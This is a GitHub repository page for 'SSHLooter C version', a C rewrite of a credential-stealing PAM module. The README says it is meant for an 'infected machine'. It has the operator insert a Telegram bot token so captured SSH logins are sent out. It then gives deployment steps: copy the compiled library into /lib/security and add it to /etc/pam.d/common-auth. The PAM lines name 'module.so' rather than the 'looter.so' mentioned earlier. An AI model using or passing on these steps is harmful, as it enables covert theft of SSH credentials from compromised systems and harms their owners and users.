Skip to content
Branch: master
Clone or download
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
Makefile first commit Dec 19, 2018
README.md first commit Dec 19, 2018
looter.c change sprintf to snprintf Dec 20, 2018

README.md

SSHLooter C version

It's the C version of sshLooter, which was written in python and have a lot of dependencies to be installed on the infected machine. Now with this C version, you compile it on your machine and send it to the infected machine without installing any dependencies.

Dependencies

  • gcc
  • libcurl4-openssl-dev
  • libpam0g-dev

Configure

Edit the looter.c and add your telegram bot token and your user id.

Compiling

make

Usage

Copy the looter.so to the infected machine on /lib/security, then edit the /etc/pam.d/common-auth and add the following lines.

auth optional module.so
account optional module.so
You can’t perform that action at this time.